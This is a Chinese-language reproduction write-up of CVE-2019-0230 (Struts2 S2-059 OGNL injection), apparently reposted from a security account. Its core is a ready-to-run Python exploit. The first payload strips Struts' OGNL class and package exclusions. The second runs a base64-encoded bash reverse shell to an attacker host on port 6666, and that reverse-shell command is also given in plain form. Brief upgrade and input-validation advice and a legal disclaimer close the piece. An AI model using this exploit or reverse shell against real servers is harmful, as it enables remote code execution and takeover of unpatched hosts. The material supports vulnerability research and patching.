Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
漏洞编号CVE-2019-0230
Struts 2.0.0 – Struts 2.5.20
攻击机:linux:192.168.20.128
靶机:Ubuntu:192.168.20.129
1、启动 Struts 2.5.16环境:
docker-compose up -d
2、启动环境之后访问http://your-ip:8080/?id=1 就可以看到测试界面
http://your-ip:8080/?id=%25%7B233*233%7D
import requests
url = "http://127.0.0.1:8080"
data1 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)
bash -i >& /dev/tcp/192.168.20.128/6666 0>&1
1.Struts官方已经发布了新版本修复了上述漏洞,请受影响的用户尽快升级进行防护。
2.若不方便升级的用户,可以参考Struts官方提供的缓解措施:
将输入参数的值重新分配给某些Struts的标签属性时,请始终对其进行验证。
考虑激活Proactive OGNL Expression Injection Protection。
参考链接:
http://blog.nsfocus.net/struts-s2-0813/
本文始发于微信公众号(Timeline Sec):CVE-2019-0230:Struts2 S2-059 远程代码执行复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论